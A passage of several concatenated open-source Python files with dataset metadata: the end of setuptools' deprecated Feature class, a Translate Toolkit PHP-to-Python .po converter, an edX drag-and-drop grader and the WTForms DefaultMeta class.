Note also that you can subclass 'Feature' to create your own specialized
feature types that modify the distribution in other ways when included or
excluded. See the docstrings for the various methods here for more detail.
Aside from the methods, the only feature attributes that distributions look
at are 'description' and 'optional'.
"""
@staticmethod
def warn_deprecated():
warnings.warn(
"Features are deprecated and will be removed in a future "
"version. See http://bitbucket.org/pypa/setuptools/65.",
DeprecationWarning,
stacklevel=3,
)
def __init__(self, description, standard=False, available=True,
optional=True, require_features=(), remove=(), **extras):
self.warn_deprecated()
self.description = description
self.standard = standard
self.available = available
self.optional = optional
if isinstance(require_features,(str,Require)):
require_features = require_features,
self.require_features = [
r for r in require_features if isinstance(r,str)
]
er = [r for r in require_features if not isinstance(r,str)]
if er: extras['require_features'] = er
if isinstance(remove,str):
remove = remove,
self.remove = remove
self.extras = extras
if not remove and not require_features and not extras:
raise DistutilsSetupError(
"Feature %s: must define 'require_features', 'remove', or at least one"
" of 'packages', 'py_modules', etc."
)
def include_by_default(self):
"""Should this feature be included by default?"""
return self.available and self.standard
def include_in(self,dist):
"""Ensure feature and its requirements are included in distribution
You may override this in a subclass to perform additional operations on
the distribution. Note that this method may be called more than once
per feature, and so should be idempotent.
"""
if not self.available:
raise DistutilsPlatformError(
self.description+" is required,"
"but is not available on this platform"
)
dist.include(**self.extras)
for f in self.require_features:
dist.include_feature(f)
def exclude_from(self,dist):
"""Ensure feature is excluded from distribution
You may override this in a subclass to perform additional operations on
the distribution. This method will be called at most once per
feature, and only after all included features have been asked to
include themselves.
"""
dist.exclude(**self.extras)
if self.remove:
for item in self.remove:
dist.exclude_package(item)
def validate(self,dist):
"""Verify that feature makes sense in context of distribution
This method is called by the distribution just before it parses its
command line. It checks to ensure that the 'remove' attribute, if any,
contains only valid package/module names that are present in the base
distribution when 'setup()' is called. You may override it in a
subclass to perform any other required validation of the feature
against a target distribution.
"""
for item in self.remove:
if not dist.has_contents_for(item):
raise DistutilsSetupError(
"%s wants to be able to remove %s, but the distribution"
" doesn't contain any packages or modules under %s"
% (self.description, item, item)
)
|
mit
|
surajssd/kuma
|
vendor/packages/translate/tools/phppo2pypo.py
|
25
|
3433
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Mozilla Corporation, Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Convert PHP format .po files to Python format .po files.
"""
import re
from translate.misc.multistring import multistring
from translate.storage import po
class phppo2pypo:
def convertstore(self, inputstore):
"""Converts a given .po file (PHP Format) to a Python format .po file, the difference being
how variable substitutions work. PHP uses a %1$s format, and Python uses
a {0} format (zero indexed). This method will convert, e.g.:
I have %2$s apples and %1$s oranges
to
I have {1} apples and {0} oranges
This method ignores strings with %s as both languages will recognize that.
"""
thetargetfile = po.pofile(inputfile="")
for unit in inputstore.units:
newunit = self.convertunit(unit)
thetargetfile.addunit(newunit)
return thetargetfile
def convertunit(self, unit):
developer_notes = unit.getnotes(origin="developer")
translator_notes = unit.getnotes(origin="translator")
unit.removenotes()
unit.addnote(self.convertstrings(developer_notes))
unit.addnote(self.convertstrings(translator_notes))
unit.source = self.convertstrings(unit.source)
unit.target = self.convertstrings(unit.target)
return unit
def convertstring(self, input):
return re.sub('%(\d)\$s', lambda x: "{%d}" % (int(x.group(1)) - 1), input)
def convertstrings(self, input):
if isinstance(input, multistring):
strings = input.strings
elif isinstance(input, list):
strings = input
else:
return self.convertstring(input)
for index, string in enumerate(strings):
strings[index] = re.sub('%(\d)\$s', lambda x: "{%d}" % (int(x.group(1)) - 1), string)
return multistring(strings)
def convertphp2py(inputfile, outputfile, template=None):
"""Converts from PHP .po format to Python .po format
:param inputfile: file handle of the source
:param outputfile: file handle to write to
:param template: unused
"""
convertor = phppo2pypo()
inputstore = po.pofile(inputfile)
outputstore = convertor.convertstore(inputstore)
if outputstore.isempty():
return False
outputfile.write(str(outputstore))
return True
def main(argv=None):
"""Converts PHP .po files to Python .po files."""
from translate.convert import convert
formats = {"po": ("po", convertphp2py)}
parser = convert.ConvertOptionParser(formats, description=__doc__)
parser.run(argv)
if __name__ == '__main__':
main()
|
mpl-2.0
|
abdoosh00/edx-platform
|
common/lib/sandbox-packages/verifiers/draganddrop.py
|
70
|
15072
|
""" Grader of drag and drop input.
Client side behavior: user can drag and drop images from list on base image.
Then json returned from client is:
{
"draggable": [
{ "image1": "t1" },
{ "ant": "t2" },
{ "molecule": "t3" },
]
}
values are target names.
or:
{
"draggable": [
{ "image1": "[10, 20]" },
{ "ant": "[30, 40]" },
{ "molecule": "[100, 200]" },
]
}
values are (x,y) coordinates of centers of dragged images.
"""
import json
def flat_user_answer(user_answer):
"""
Convert nested `user_answer` to flat format.
{'up': {'first': {'p': 'p_l'}}}
to
{'up': 'p_l[p][first]'}
"""
def parse_user_answer(answer):
key = answer.keys()[0]
value = answer.values()[0]
if isinstance(value, dict):
# Make complex value:
# Example:
# Create like 'p_l[p][first]' from {'first': {'p': 'p_l'}
complex_value_list = []
v_value = value
while isinstance(v_value, dict):
v_key = v_value.keys()[0]
v_value = v_value.values()[0]
complex_value_list.append(v_key)
complex_value = '{0}'.format(v_value)
for i in reversed(complex_value_list):
complex_value = '{0}[{1}]'.format(complex_value, i)
res = {key: complex_value}
return res
else:
return answer
result = []
for answer in user_answer:
parse_answer = parse_user_answer(answer)
result.append(parse_answer)
return result
class PositionsCompare(list):
""" Class for comparing positions.
Args:
list or string::
"abc" - target
[10, 20] - list of integers
[[10,20], 200] list of list and integer
"""
def __eq__(self, other):
""" Compares two arguments.
Default lists behavior is conversion of string "abc" to list
["a", "b", "c"]. We will use that.
If self or other is empty - returns False.
Args:
self, other: str, unicode, list, int, float
Returns: bool
"""
# checks if self or other is not empty list (empty lists = false)
if not self or not other:
return False
if (isinstance(self[0], (list, int, float)) and
isinstance(other[0], (list, int, float))):
return self.coordinate_positions_compare(other)
elif (isinstance(self[0], (unicode, str)) and
isinstance(other[0], (unicode, str))):
return ''.join(self) == ''.join(other)
else: # improper argument types: no (float / int or lists of list
#and float / int pair) or two string / unicode lists pair
return False
def __ne__(self, other):
return not self.__eq__(other)
def coordinate_positions_compare(self, other, r=10):
""" Checks if self is equal to other inside radius of forgiveness
(default 10 px).
Args:
self, other: [x, y] or [[x, y], r], where r is radius of
forgiveness;
x, y, r: int
Returns: bool.
"""
# get max radius of forgiveness
if isinstance(self[0], list): # [(x, y), r] case
r = max(self[1], r)
x1, y1 = self[0]
else:
x1, y1 = self
if isinstance(other[0], list): # [(x, y), r] case
r = max(other[1], r)
x2, y2 = other[0]
else:
x2, y2 = other
if (x2 - x1) ** 2 + (y2 - y1) ** 2 > r * r:
return False
return True
class DragAndDrop(object):
""" Grader class for drag and drop inputtype.
"""
def grade(self):
''' Grader user answer.
Checks if every draggable isplaced on proper target or on proper
coordinates within radius of forgiveness (default is 10).
Returns: bool.
'''
for draggable in self.excess_draggables:
if self.excess_draggables[draggable]:
return False # user answer has more draggables than correct answer
# Number of draggables in user_groups may be differ that in
# correct_groups, that is incorrect, except special case with 'number'
for index, draggable_ids in enumerate(self.correct_groups):
# 'number' rule special case
# for reusable draggables we may get in self.user_groups
# {'1': [u'2', u'2', u'2'], '0': [u'1', u'1'], '2': [u'3']}
# if '+number' is in rule - do not remove duplicates and strip
# '+number' from rule
current_rule = self.correct_positions[index].keys()[0]
if 'number' in current_rule:
rule_values = self.correct_positions[index][current_rule]
# clean rule, do not do clean duplicate items
self.correct_positions[index].pop(current_rule, None)
parsed_rule = current_rule.replace('+', '').replace('number', '')
self.correct_positions[index][parsed_rule] = rule_values
else: # remove dublicates
self.user_groups[index] = list(set(self.user_groups[index]))
if sorted(draggable_ids) != sorted(self.user_groups[index]):
return False
# Check that in every group, for rule of that group, user positions of
# every element are equal with correct positions
for index, _ in enumerate(self.correct_groups):
rules_executed = 0
for rule in ('exact', 'anyof', 'unordered_equal'):
# every group has only one rule
if self.correct_positions[index].get(rule, None):
rules_executed += 1
if not self.compare_positions(
self.correct_positions[index][rule],
self.user_positions[index]['user'], flag=rule):
return False
if not rules_executed: # no correct rules for current group
# probably xml content mistake - wrong rules names
return False
return True
def compare_positions(self, correct, user, flag):
""" Compares two lists of positions with flag rules. Order of
correct/user arguments is matter only in 'anyof' flag.
Rules description:
'exact' means 1-1 ordered relationship::
[el1, el2, el3] is 'exact' equal to [el5, el6, el7] when
el1 == el5, el2 == el6, el3 == el7.
Equality function is custom, see below.
'anyof' means subset relationship::
user = [el1, el2] is 'anyof' equal to correct = [el1, el2, el3]
when
set(user) <= set(correct).
'anyof' is ordered relationship. It always checks if user
is subset of correct
Equality function is custom, see below.
Examples:
- many draggables per position:
user ['1','2','2','2'] is 'anyof' equal to ['1', '2', '3']
- draggables can be placed in any order:
user ['1','2','3','4'] is 'anyof' equal to ['4', '2', '1', 3']
'unordered_equal' is same as 'exact' but disregards on order
Equality functions:
Equality functon depends on type of element. They declared in
PositionsCompare class. For position like targets
ids ("t1", "t2", etc..) it is string equality function. For coordinate
positions ([1,2] or [[1,2], 15]) it is coordinate_positions_compare
function (see docstrings in PositionsCompare class)
Args:
correst, user: lists of positions
Returns: True if within rule lists are equal, otherwise False.
"""
if flag == 'exact':
if len(correct) != len(user):
return False
for el1, el2 in zip(correct, user):
if PositionsCompare(el1) != PositionsCompare(el2):
return False
if flag == 'anyof':
for u_el in user:
for c_el in correct:
if PositionsCompare(u_el) == PositionsCompare(c_el):
break
else:
# General: the else is executed after the for,
# only if the for terminates normally (not by a break)
# In this case, 'for' is terminated normally if every element
# from 'correct' list isn't equal to concrete element from
# 'user' list. So as we found one element from 'user' list,
# that not in 'correct' list - we return False
return False
if flag == 'unordered_equal':
if len(correct) != len(user):
return False
temp = correct[:]
for u_el in user:
for c_el in temp:
if PositionsCompare(u_el) == PositionsCompare(c_el):
temp.remove(c_el)
break
else:
# same as upper - if we found element from 'user' list,
# that not in 'correct' list - we return False.
return False
return True
def __init__(self, correct_answer, user_answer):
""" Populates DragAndDrop variables from user_answer and correct_answer.
If correct_answer is dict, converts it to list.
Correct answer in dict form is simpe structure for fast and simple
grading. Example of correct answer dict example::
correct_answer = {'name4': 't1',
'name_with_icon': 't1',
'5': 't2',
'7': 't2'}
It is draggable_name: dragable_position mapping.
Advanced form converted from simple form uses 'exact' rule
for matching.
Correct answer in list form is designed for advanced cases::
correct_answers = [
{
'draggables': ['1', '2', '3', '4', '5', '6'],
'targets': [
's_left', 's_right', 's_sigma', 's_sigma_star', 'p_pi_1', 'p_pi_2'],
'rule': 'anyof'},
{
'draggables': ['7', '8', '9', '10'],
'targets': ['p_left_1', 'p_left_2', 'p_right_1', 'p_right_2'],
'rule': 'anyof'
}
]
Advanced answer in list form is list of dicts, and every dict must have
3 keys: 'draggables', 'targets' and 'rule'. 'Draggables' value is
list of draggables ids, 'targes' values are list of targets ids, 'rule'
value one of 'exact', 'anyof', 'unordered_equal', 'anyof+number',
'unordered_equal+number'
Advanced form uses "all dicts must match with their rule" logic.
Same draggable cannot appears more that in one dict.
Behavior is more widely explained in sphinx documentation.
Args:
user_answer: json
correct_answer: dict or list
"""
self.correct_groups = [] # Correct groups from xml.
self.correct_positions = [] # Correct positions for comparing.
self.user_groups = [] # Will be populated from user answer.
self.user_positions = [] # Will be populated from user answer.
# Convert from dict answer format to list format.
if isinstance(correct_answer, dict):
tmp = []
for key, value in correct_answer.items():
tmp.append({
'draggables': [key],
'targets': [value],
'rule': 'exact'})
correct_answer = tmp
# Convert string `user_answer` to object.
user_answer = json.loads(user_answer)
# This dictionary will hold a key for each draggable the user placed on
# the image. The value is True if that draggable is not mentioned in any
# correct_answer entries. If the draggable is mentioned in at least one
# correct_answer entry, the value is False.
# default to consider every user answer excess until proven otherwise.
self.excess_draggables = dict((users_draggable.keys()[0],True)
for users_draggable in user_answer)
# Convert nested `user_answer` to flat format.
user_answer = flat_user_answer(user_answer)
# Create identical data structures from user answer and correct answer.
for answer in correct_answer:
user_groups_data = []
user_positions_data = []
for draggable_dict in user_answer:
# Draggable_dict is 1-to-1 {draggable_name: position}.
draggable_name = draggable_dict.keys()[0]
if draggable_name in answer['draggables']:
user_groups_data.append(draggable_name)
user_positions_data.append(
draggable_dict[draggable_name])
# proved that this is not excess
self.excess_draggables[draggable_name] = False
self.correct_groups.append(answer['draggables'])
self.correct_positions.append({answer['rule']: answer['targets']})
self.user_groups.append(user_groups_data)
self.user_positions.append({'user': user_positions_data})
def grade(user_input, correct_answer):
""" Creates DragAndDrop instance from user_input and correct_answer and
calls DragAndDrop.grade for grading.
Supports two interfaces for correct_answer: dict and list.
Args:
user_input: json. Format::
{ "draggables":
[{"1": [10, 10]}, {"name_with_icon": [20, 20]}]}'
or
{"draggables": [{"1": "t1"}, \
{"name_with_icon": "t2"}]}
correct_answer: dict or list.
Dict form::
{'1': 't1', 'name_with_icon': 't2'}
or
{'1': '[10, 10]', 'name_with_icon': '[[10, 10], 20]'}
List form::
correct_answer = [
{
'draggables': ['l3_o', 'l10_o'],
'targets': ['t1_o', 't9_o'],
'rule': 'anyof'
},
{
'draggables': ['l1_c','l8_c'],
'targets': ['t5_c','t6_c'],
'rule': 'anyof'
}
]
Returns: bool
"""
return DragAndDrop(correct_answer=correct_answer,
user_answer=user_input).grade()
|
agpl-3.0
|
initNirvana/Easyphotos
|
env/lib/python3.4/site-packages/wtforms/meta.py
|
114
|
3684
|
from wtforms.utils import WebobInputWrapper
from wtforms import i18n
class DefaultMeta(object):
"""
This is the default Meta class which defines all the default values and
therefore also the 'API' of the class Meta interface.
"""
# -- Basic form primitives
def bind_field(self, form, unbound_field, options):
"""
bind_field allows potential customization of how fields are bound.
The default implementation simply passes the options to
:meth:`UnboundField.bind`.
:param form: The form.
:param unbound_field: The unbound field.
:param options:
A dictionary of options which are typically passed to the field.
:return: A bound field
"""
return unbound_field.bind(form=form, **options)
def wrap_formdata(self, form, formdata):
"""
wrap_formdata allows doing custom wrappers of WTForms formdata.
The default implementation detects webob-style multidicts and wraps
them, otherwise passes formdata back un-changed.
:param form: The form.
:param formdata: Form data.
:return: A form-input wrapper compatible with WTForms.
"""
if formdata is not None and not hasattr(formdata, 'getlist'):
if hasattr(formdata, 'getall'):
return WebobInputWrapper(formdata)
else:
raise TypeError("formdata should be a multidict-type wrapper that supports the 'getlist' method")
return formdata
def render_field(self, field, render_kw):
"""
render_field allows customization of how widget rendering is done.
The default implementation calls ``field.widget(field, **render_kw)``
"""
return field.widget(field, **render_kw)
# -- CSRF
csrf = False
csrf_field_name = 'csrf_token'
csrf_secret = None
csrf_context = None
csrf_class = None
def build_csrf(self, form):
"""
Build a CSRF implementation. This is called once per form instance.
The default implementation builds the class referenced to by
:attr:`csrf_class` with zero arguments. If `csrf_class` is ``None``,
will instead use the default implementation
:class:`wtforms.csrf.session.SessionCSRF`.
:param form: The form.
:return: A CSRF implementation.
"""
if self.csrf_class is not None:
return self.csrf_class()
from wtforms.csrf.session import SessionCSRF
return SessionCSRF()
# -- i18n
locales = False
cache_translations = True
translations_cache = {}
def get_translations(self, form):
"""
Override in subclasses to provide alternate translations factory.
See the i18n documentation for more.
:param form: The form.
:return: An object that provides gettext() and ngettext() methods.
"""
locales = self.locales
if locales is False:
return None
if self.cache_translations:
# Make locales be a hashable value
locales = tuple(locales) if locales else None
translations = self.translations_cache.get(locales)
if translations is None:
translations = self.translations_cache[locales] = i18n.get_translations(locales)
return translations
return i18n.get_translations(locales)
# -- General
def update_values(self, values):
"""
Given a dictionary of values, update values on this `Meta` instance.
"""
for key, value in values.items():
setattr(self, key, value)
|
mit
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.